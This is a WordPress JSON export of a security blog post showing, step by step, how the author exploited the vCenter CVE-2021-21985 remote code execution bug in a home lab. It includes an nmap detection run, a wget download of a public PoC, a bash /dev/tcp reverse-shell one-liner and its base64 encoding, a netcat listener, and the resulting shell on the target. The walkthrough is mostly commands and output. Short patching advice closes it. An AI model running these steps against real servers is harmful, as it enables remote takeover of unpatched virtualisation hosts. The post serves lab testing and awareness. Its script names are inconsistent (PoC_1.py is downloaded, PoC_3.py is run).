{"id":1122,"date":"2021-06-07T18:55:48","date_gmt":"2021-06-07T10:55:48","guid":{"rendered":"\/?p=1122"},"modified":"2021-06-07T18:55:48","modified_gmt":"2021-06-07T10:55:48","slug":"vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/","title":{"rendered":"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC"},"content":{"rendered":"

VMware first announced on the 25th of May a remote code execution vulnerability in VCenter server’s VSAN health plugin. The bug affects all versions from 6.5 onwards to 7.0. It has a CVE score of 9.8, it’s an understatement to call this one a whopper! Early this week the PoC’s started to be released on Twitter and then Github, along with media exposure and the standard bulk scanning for open VCenter hosts directly connect to the Internet.
\nI tried a few of the public exploits in my lab and the one that worked reliably was released by testanull<\/a> on Github.<\/p>\n

Here are the steps I followed to test out the PoC exploit:<\/p>\n

Prerequisites<\/strong>
\nI used VMware Workstation in my lab environment. Setup a nested ESXi 7.x host and then deploy VCSA on it. I used VCSA 7.0.0-15952498. Follow the wizard and wait for the VCSA to fully load all services, be sure you can login to the HTML 5 web client.<\/p>\n

NMAP Script<\/strong>
\nLets use nmap to check if the target VCenter we just setup is vulnerable to CVE-2021-21985:
\n1. Download the nse script from github here<\/a>.
\n2. Move the nse script to correct directory for your nmap install (I am using Ubuntu server):
\nsudo cp CVE-2021-21985.nse \/usr\/share\/nmap\/scripts\/<\/code>
\n3. Run the nmap script against the target:
\nadministrator@tabernacle:~\/poc$ sudo nmap -p443 --script CVE-2021-21985.nse 192.168.100.50
\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2021-06-07 11:32 UTC
\nNmap scan report for 192.168.100.50
\nHost is up (0.00068s latency).
\nPORT STATE SERVICE
\n443\/tcp open https
\n| CVE-2021-21985:
\n| VULNERABLE:
\n| vCenter 6.5-7.0 RCE
\n| State: VULNERABLE (Exploitable)
\n| IDs: CVE:CVE-2021-21985
\n| The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input
\n| validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server.
\n| Disclosure date: 2021-05-28
\n| References:
\n|_ https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-21985
\nMAC Address: 00:0C:29:F1:09:98 (VMware)
\nNmap done: 1 IP address (1 host up) scanned in 0.50 seconds<\/code><\/p>\n

Exploit Method<\/strong>
\n1. Setup the attacker machine, can be Windows, Linux, does not matter. I used an Ubuntu VM, make sure python3 is installed.
\n2. Download the poc with wget:
\nwget https:\/\/raw.githubusercontent.com\/testanull\/Project_CVE-2021-21985_PoC\/main\/PoC_1.py<\/code>
\n3. Now you must edit the script with your bash reverse shell string in base64. An example of the string is as follows:
\nbash -i >& \/dev\/tcp\/192.168.1.12\/4444 0>&1<\/code>
\nNow use base64encode.org<\/a> to convert the string. Here is the base64 output of the above string:
\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTIvNDQ0NCAwPiYx<\/string><\/code>
\nEdit the script in nano and paste your base64 reverse shell string into the cmd variable:
\ncmd = \"\"\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTIvNDQ0NCAwPiYx}<\/code>
\nSave the changes.
\n4. OK, so now we have updated the exploit cmd variable with your reverse shell string. Open two terminal windows are open.
\nIn the first window setup the netcat command for the reverse shell:
\nnc -lnvp 4444<\/code>
\nIn the second window, you can invoke the exploit now against the target VCenter:
\nadministrator@tabernacle:~\/poc$ python3 PoC_3.py https:\/\/192.168.100.50<\/code>
\n5. If all went well you will see the output of the script and the shell on the netcat window:
\nTarget: https:\/\/192.168.100.50
\nCmd: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTIvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}
\nWriting file
\nSetting cmd
\nFinal stage ...<\/code>
\n6. Profit:
\nadministrator@tabernacle:~\/poc$ nc -lnvp 4444
\nListening on 0.0.0.0 4444
\nConnection received on 192.168.100.50 60860
\nbash: cannot set terminal process group (2035): Inappropriate ioctl for device
\nbash: no job control in this shell
\nvsphere-ui [ \/usr\/lib\/vmware-vsphere-ui\/server ]$whoami
\nwhoami
\nvsphere-ui<\/code>
\n\"VMware-RCE\"<\/a><\/p>\n

How do I protect myself from this vulnerability?
\n1. Obviously no VCenter server should ever be directly accessible from the Internet.
\n2. Patch the VCenter server<\/a> from the administration panel, its simple and takes an hour or so. VMware have fixed the live update process in recent releases (6.7, 7.x)<\/p>\n","protected":false},"excerpt":{"rendered":"

VMware first announced on the 25th of May a remote code execution vulnerability in VCenter server’s VSAN health plugin. The bug affects all versions from…<\/p>\n","protected":false},"author":2,"featured_media":1123,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,2,17],"tags":[80,156,192,198],"class_list":["post-1122","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-datacentre","category-vmware","tag-cve-2021-21985","tag-rce","tag-vcenter","tag-vmware"],"acf":[],"yoast_head":"\nVMware VCenter Server Remote Code Execution CVE-2021-21985 PoC - Insecure Wire<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"VMware first announced on the 25th of May a remote code execution vulnerability in VCenter server’s VSAN health plugin. The bug affects all versions from...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-07T10:55:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png\" \/>\n\t<meta property=\"og:image:width\" content=\"2904\" \/>\n\t<meta property=\"og:image:height\" content=\"289\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC\",\"datePublished\":\"2021-06-07T10:55:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\"},\"wordCount\":419,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png\",\"keywords\":[\"CVE-2021-21985\",\"RCE\",\"VCenter\",\"VMware\"],\"articleSection\":[\"Attack\",\"Datacentre\",\"VMware\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\",\"name\":\"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png\",\"datePublished\":\"2021-06-07T10:55:48+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png\",\"width\":2904,\"height\":289,\"caption\":\"VMware-RCE\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC - Insecure Wire","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/","og_locale":"en_US","og_type":"article","og_title":"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC - Insecure Wire","og_description":"VMware first announced on the 25th of May a remote code execution vulnerability in VCenter server’s VSAN health plugin. The bug affects all versions from...","og_url":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/","og_site_name":"Insecure Wire","article_published_time":"2021-06-07T10:55:48+00:00","og_image":[{"width":2904,"height":289,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png","type":"image\/png"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC","datePublished":"2021-06-07T10:55:48+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/"},"wordCount":419,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png","keywords":["CVE-2021-21985","RCE","VCenter","VMware"],"articleSection":["Attack","Datacentre","VMware"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/","url":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/","name":"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png","datePublished":"2021-06-07T10:55:48+00:00","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2021\/06\/VMware-RCE.png","width":2904,"height":289,"caption":"VMware-RCE"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2021\/06\/07\/vmware-vcenter-server-remote-code-execution-cve-2021-21985-poc\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"VMware VCenter Server Remote Code Execution CVE-2021-21985 PoC"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1122"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1122\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1123"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}